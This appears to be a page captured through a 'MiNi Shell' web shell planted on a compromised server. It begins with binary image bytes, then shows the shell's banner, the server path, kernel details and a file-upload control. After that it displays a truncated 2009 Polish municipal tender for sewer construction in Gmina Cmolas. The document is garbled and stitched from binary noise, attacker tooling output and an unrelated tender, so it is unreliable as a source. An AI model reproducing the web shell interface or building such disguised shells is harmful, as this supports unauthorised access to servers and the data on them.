JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090410/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090410/61697-N-2009.html

<p class="kh_header"><b>Cmolas: Budowa kanalizacji sanitarnej w miejscowości Ostrowy Tuszowskie, Ostrowy Baranowskie i Jagodnik gmina Cmolas</b><br>
<b>Numer ogłoszenia: 61697 - 2009; data zamieszczenia: 10.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Cmolas , 237b, 36-105 Cmolas, woj. podkarpackie, tel. 017 2837702, faks 017 2272873.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.cmolas.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kanalizacji sanitarnej w miejscowości Ostrowy Tuszowskie, Ostrowy Baranowskie i Jagodnik gmina Cmolas.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest budowa sieci kanalizacji sanitarnej w miejscowości Ostrowy Tuszowskie, Ostrowy Baranowskie, Jagodnik.
Zakres robót obejmuje:
1. Budowę kanalizacji sanitarnej wraz z przyłączami w miejscowości Ostrowy Tuszowskie, tj.: 
Kanały grawitacyjne z rur kanałowych PCV o średnicy:
- PCV o średnicy 160 mm o długości 7 859 mb 
- PCV o średnicy 200 mm o długości 11 932 mb
Rurociągi tłoczne z rur polietylenowych PE o średnicach:
- O 90 o długości 742 mb 
- O 110 o długości 1170 mb
- O 125 o długości 1641 mb
- O 140 o długości 3746 mb
- O 63 o długości 324 mb
Studzienki o średnicach:
- studzienki żelbetowe O 1200 mm - 7 sztuk
- studzienki kanalizacyjne inspekcyjne - 84 sztuki
Wykonanie 7 pompowni głównych i 3 pompowni lokalnych wraz z zasilaniem elektrycznym.
Wykonanie 208 przyłączy o łącznej długości 1040 mb.
2. Budowa kanalizacji sanitarnej wraz z przyłączami w miejscowości Ostrowy Baranowskie, tj.:
Kanały grawitacyjne z rur kanałowych PCV o średnicy:
- PCV o średnicy 160 mm o długości 633 mb 
- PCV o średnicy 200 mm o długości 1801 mb
Rurociągi tłoczne z rury polietylenowej PE o średnicy:
- rurociąg tłoczny:  O 90 o długości 781 mb		    
Studzienki o średnicach:
- studzienki żelbetowe O 1200 mm - 7 sztuk
- studzienki kanalizacyjne inspekcyjne- 84 sztuki
Wykonanie 2 pompowni głównych wraz z zasilaniem elektrycznym
Wykonanie 3 przydomowych oczyszczalni ścieków 
Wykonanie 21 przyłączy o łącznej długości105 mb.
3. Budowa kanalizacji sanitarnej wraz z przyłączami w miejscowości Jagodnik, tj.:
Kanały grawitacyjne z rur kanałowych o średnicy:
- PCV o średnicy 160 mm o długości 2509 mb 
- PCV o średnicy 200 mm o długości 5998 mb 
Rurociągi tłoczne z rur polietylenowych PE o średnicach:
- O 90 o długości 663 mb
- O 110 o długości 971 mb
- O 63 o długości 401 mb
Studzienki studzienek o średnicach:
- studzienki żelbetowe O 1200 mm - 10 sztuk
- studzienki kanalizacyjne inspekcyjne O 315 mm - 287 sztuk
Wykonanie 3 pompowni głównych oraz 2 przepompowni lokalnych wraz z zasilaniem elektrycznym 
Wykonanie 1 przydomowej oczyszczalni ścieków
Wykonanie 69 przyłączy o łącznej długości 345 mb.
Szczegółowy zakres robót precyzują załączone przedmiary robót - Załącznik Nr 4 i projekt budowlany Załącznik Nr 5..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.10-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu zobowiązany jest do wniesienia wadium 
w wysokości 100.000,00 zł. (słownie: sto tysięcy złotych 00/100).
Wadium powinno być wniesione w wybranej przez wykonawcę formie zgodnie z art. 45, ust. 6, pkt 1-5 ustawy Prawo Zamówień Publicznych do dnia 04-05-2009 do godz. 9:30 a dowód uiszczenia dostarczyć do Kasy Urzędu Gminy Cmolas (pokój           nr 25), zaś kserokopię potwierdzoną za zgodność do oferty. 
W przypadku wnoszenia wadium w formie pieniądza wymaganą kwotę należy wpłacić na konto Zamawiającego na rachunek bankowy Nr 08 9180 1021 2002 1000 7748 0010 BS Kolbuszowa Oddział Cmolas. Kwota wadium winna znaleźć się na rachunku Zamawiającego najpóźniej do dnia 03-05-2009.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	Warunki udziału w postępowaniu.
O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone   w art. 22 ust. 1 ustawy - Pzp, tj.:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 Ustawy-Pzp.
2.	Wykonawca ubiegający o udzielenie zamówienia musi.
1)	wykazać realizację jako generalny wykonawca w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 3 zamówienia o łącznej kwocie 6 000 000,00  odpowiadające swoimi rodzajami robót budowlanymch o charakterze i złożoności technologicznej porównywalnej z zakresem stanowiącym przedmiot zamówienia
2)	przedstawić dokumenty potwierdzające, że zamówienia te zostały wykonane należycie
3)	wykazać odpowiednio wykwalifikowany personel,
4)	przedstawić dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia oraz że zostały wpisane do okręgowej izby samorządu zawodowego,
5)	posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej,
3.	W przypadku gdy wykonawcy wspólnie ubiegać się będą o udzielenie zamówienia:
1)	Wykonawcy składający ofertę wspólną ustanawiają pełnomocnika do reprezentowania ich w postępowaniu i zawarciu umowy,
2)	oferta wspólna, składana przez dwie lub więcej firm występujących jako partnerzy konsorcjum powinna spełniać następujące wymagania:
- oświadczenia i dokumenty, dotyczące własnej firmy, takie jak np.: oświadczenie dotyczące określonych okoliczności w art. 22, odpis                        z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, zaświadczenie z właściwego urzędu skarbowego i z właściwego oddziału ZUS, informacja z KRK - składa każdy z partnerów konsorcjum w imieniu swojej firmy,
- oświadczenia i dokumenty wspólne takie jak np.: oferta cenowa i załączniki składa pełnomocnik konsorcjum w imieniu całego konsorcjum,
- oświadczenia i dokumenty dotyczące spełnienia postawionych przez zamawiającego warunków składają ci partnerzy konsorcjum którzy zgodnie z umową konsorcjum za ich spełnienie odpowiadają np. doświadczenie w wykonywaniu prac podobnych, dysponowanie osobami posiadającymi odpowiednie uprawnienia, wskazanie określonego obrotu,
- pełnomocnik występuje w toku postępowania z wszelkimi sprawami do zamawiającego,
- Wadium oraz zabezpieczenie należytego wykonania umowy wnoszone w formie innej niż pieniężna musi być wystawione na wszystkich partnerów.
- wykaz osób i podmiotów, które będą wykonywać wspólnie zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z informacją na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności,
- Lider musi wykazać realizację jako generalny wykonawca w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 3 zamówienia o łącznej kwocie 6 000 000,00  odpowiadające swoimi rodzajami robót budowlanymch o charakterze i złożoności technologicznej porównywalnej z zakresem stanowiącym przedmiot zamówienia
Uwaga: Okoliczności uzasadniające wykluczenie z mocy przepisów art. 24 prawa zamówień publicznych, zachodzące choćby względem jednego współwykonawcy dyskwalifikuje całe konsorcjum.
3)	Jeżeli oferta wykonawców o których mowa w pkt. 1 została wybrana, zamawiający będzie żądał przed zawarciem umowy w sprawie zamówienia publicznego, dostarczenia umowy regulującej  współpracę tych wykonawców, która będzie zawierała co najmniej:
a)	zobowiązanie do realizacji  wspólnego przedsięwzięcia gospodarczego obejmującego swoim zakresem realizację przedmiotu zamówienia oraz ich solidarną odpowiedzialność za wykonanie zamówienia,
b)	określenie zakresu działania poszczególnych stron umowy,
c)	czas obowiązywania umowy, który nie może być krótszy niż okres obejmujący realizację zamówienia oraz czas trwania gwarancji jakości i rękojmi.
4)	Dokument należy złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę.
5)	Wykonawcy, o których mowa w pkt. 1 ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy.
4.	Do przetargu mogą przystąpić wyłącznie ci wykonawcy, którzy otrzymają Specyfikację Istotnych Warunków Zamówienia od Zamawiającego lub pobiorą ją z jego strony internetowej. 
Każdy wykonawca może złożyć jedną ofertę.
5.	Ofertę stanowi formularz ofertowy (załącznik nr 1 do niniejszej SIWZ) i inne dokumenty, potwierdzające spełnienie przez oferenta wymaganych warunków.
6.	Oferta musi być podpisana przez uprawnioną osobę (lub osoby).
7.	Sposób dokonania oceny spełnienia warunków udziału w postępowaniu.
Ocena spełnienia warunków udziału w postępowaniu zostanie przeprowadzona na podstawie złożonych przez wykonawców dokumentów i oświadczeń, wymaganych w dziale 6 SIWZ - zgodnie z formułą spełnia - nie spełnia. Zamawiający w trakcie ww. oceny będzie brał pod uwagę jedynie dokumenty i oświadczenia, których wymagał w SIWZ na potwierdzenie spełniania postawionych warunków. W przypadku złożenia przez Wykonawcę oświadczenia lub dokumentu, zawierającego informację, że Wykonawca nie spełnia warunku udziału w postępowaniu lub nie złożenia przez Wykonawcę dokumentu potwierdzającego spełnianie warunku udziału w postępowaniu Zamawiający, z zastrzeżeniem art. 26 ust. 3 i 4 ustawy Prawo zamówień publicznych uzna, że Wykonawca warunku nie spełnia i wykluczy go z udziału w postępowaniu o czym zamawiający zawiadomi niezwłocznie wykluczonego wykonawcę podając uzasadnienie..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	W celu potwierdzenia spełnienia warunków udziału w postępowaniu określonych w niniejszej specyfikacji istotnych warunków zamówienia, Wykonawcy złożą następujące dokumenty i oświadczenia :
1)	oświadczenie oferenta, że nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 i spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych ( na załączonym druku ) - formularz Nr 1 do oferty,
2)	aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenie do ewidencji działalności gospodarczej, (wystawiony nie wcześniej niż 6 m-cy przed upływem terminu składania ofert lub potwierdzenie aktualności przez organ wydający wypis),
3)	aktualna informacja z Krajowego Rejestru Karnego albo równoważnego zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Prawo zamówień publicznych, wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
4)	aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Prawo zamówień publicznych, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
5)	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
6)	aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
7)	Wykaz wykonanych robót w okresie ostatnich pięciu lat (min. 3 tożsame z zamówieniem roboty budowlane) z podaniem zakresu przedmiotu zamówienia, dat usług i odbiorców oraz dokumenty potwierdzające, że usługi te zostały wykonane należycie - formularz Nr 2 do oferty.
8)	Informacja nt. przeciętnej liczby zatrudnionych pracowników oraz liczebności personelu kierowniczego, wraz z poświadczonymi kopiami świadectw nadania uprawnień zawodowych - formularz Nr 3 do oferty.
9)	Zaakceptowany projekt umowy (parafowany wzór umowy).
10)	Wykaz niezbędnych do wykonania zamówienia nazrzędzi i urządzeń jakie posiada wykonawca - formularz Nr 4 do oferty,
11)	Wskazanie przez wykonawcę w ofercie części zamówienia, którą wykonanie zamierza powierzyć podwykonawcom (jeśli dotyczy) - formularz Nr 5 do oferty, 
12)	Informacja banku, w którym wykonawca posiada podstawowy rachunek bankowy, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
13)	polisa lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
2.	Wykonawca ma dostarczyć także:
1)	wykaz osób i podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z informacją na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, (jeżeli wykonawcy wspólnie ubiegać się będą o udzielenie zamówienia, np. konsorcjum),
2)	Kosztorys ofertowy sporządzony w wersji pełnej wraz z limitami R, M, S opracowany na podstawie przedmiarów robót załączonych do SIWZ
3)	Kopia wpłaty wadium,
4)	Harmonogram realizacji przedmiotu zamówienia:
- Harmonogram robót musi uwzględniać wymagania odnośnie terminów i zaawansowania robót, a także podział robót na takie elementy, które umożliwiać będą sukcesywną realizację faktur częściowych za wykonane roboty.
- Harmonogram robót (rzeczowo - finansowy) należy opracować dostosowując terminy do harmonogramu realizacji projektu który stanowi element wniosku o dofinansowanie w ramach RPO WP - Załącznik nr 6
3.	Wykonawca zobowiązany jest do zapoznania się z terenem, gdzie prowadzone będą roboty objęte przedmiotem zamówienia celem sprawdzenia warunków związanych z ich wykonaniem oraz celem uzyskania wszelkich dodatkowych informacji koniecznych i przydatnych do oceny prac, gdyż wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego skalkulowania ceny lub pominięcia elementów niezbędnych do wykonania umowy.
Należy załączyć stosowne oświadczenie.
4.	Wymagane dokumenty mogą być przedstawione w formie oryginałów lub kserokopii poświadczonej za zgodność z oryginałem przez osobę upoważnioną do reprezentowania oferenta
Uwaga:
- w przypadku gdy wykonawcy będą wspólnie ubiegać się o udzielenie zamówienia konieczne jest udokumentowanie przez poszczególnych wykonawców okoliczności potwierdzających brak podstaw do wykluczenia z postępowania na podstawie art. 24 ust. 1 i 2,
- wykonawca nie później niż w terminie składania ofert może zastrzec, które informacje nie mogą zostać udostępniane, gdyż stanowią tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji; brak zastrzeżeń oznaczać będzie, ze wszelkie złożone przez wykonawcę informację są jawne i mogą być udostępniane.
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej zamiast dokumentu, o którym mowa powyżej, składa dokument  wystawiony w terminie  i  formie określonej w  § 2 Rozporządzenia  Prezesa   Rady Ministrów z dnia 19 maja 2006 r., w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form w jakich dokumenty te maja być składane.
Dokumenty składane w języku obcym należy złożyć wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę. Kopia tłumaczenia musi być poświadczona wg poniższych zasad.
Dokumenty są składane w formie oryginału lub kopii poświadczonej za zgodność    z oryginałem przez Wykonawcę. Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokutemu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
Pełnomocnicy działający w imieniu Wykonawcy muszą wykazać swoje umocowanie do działania. Pełnomocnictwo legitymuje pełnomocnika do wykonywania czynności prawnych w imieniu mocodawcy zatem jego zakres i okres obowiązywania powinien być wyraźnie i precyzyjnie określony.
Pełnomocnictwo winno być dołączone do oferty w oryginale lub kopii uwierzytelnionej przez Mocodawcę lub notariusza. Przyjmuje się, że udzielone pełnomocnictwo upoważnia do poświadczenia kopii innych dokumentów składanych wraz ofertą, z wyłączeniem pełnomocnictwa.


5.	Warunki prowadzenia robót budowlanych:
1)	Realizacja zadania odbywać się będzie na terenie objętym projektem;
2)	Koszty urządzenia i utrzymania zaplecza budowy obciążają Wykonawcę;
3)	Wykonawca we własnym zakresie zorganizuje zaplecze budowy na terenie przeznaczonym pod realizację zadania
4)	Wykonawca zobowiązany jest do prowadzenia robót w sposób:
- nie powodujący dewastacji terenów przyległych,
- zapewniający wymagane warunki techniczno - użytkowe,
- zapewniający ochronę mienia,
5)	Wykonawca zobowiązany jest:
- uzyskać zgodę na ewentualne czasowe zajęcie pasa drogowego,
- zapewnić bezpieczną organizacje ruchu kołowego i pieszego wraz
z widocznym i czytelnym oznakowaniem, dotyczy to także komunikacji pieszej i kołowej na terenie przylegającym do realizowanej budowy,
- zapewnić ciągły nadzór nad oznakowaniem i ew. wprowadzanymi zmianami w ruchu,
- zabezpieczyć teren budowy (robót) przed dostępem niepożądanych osób,
- utrzymać w należytym porządku i czystości wspólnie użytkowane drogi komunikacyjne,
- przestrzegać przepisów bhp i ppoż. w okresie realizacji robót,
6) Wykonawca zobowiązany jest przy wykonywaniu robót stosować wyłącznie pełnowartościowe materiały budowlane - zgodnie z normami budowlanymi obowiązującymi dla tego typu obiektów. Przy odbiorze robót wykonawca musi przedstawić Zamawiającemu stosowne atesty i certyfikaty.
7) Wykonawcę w pełnym zakresie obciąża obsługa geodezyjna, w której zakres wchodzi inwentaryzacja powykonawcza,.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.cmolas.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Cmolas
36-105 Cmolas 237 b.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.05.2009 godzina 09:30, miejsce: Urząd Gminy Cmolas
36-105 Cmolas 237 b
pok nr 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Budowa kanalizacji sanitarnej w miejscowości Ostrowy Tuszowskie,

Creat By MiNi SheLL
Email: jattceo@gmail.com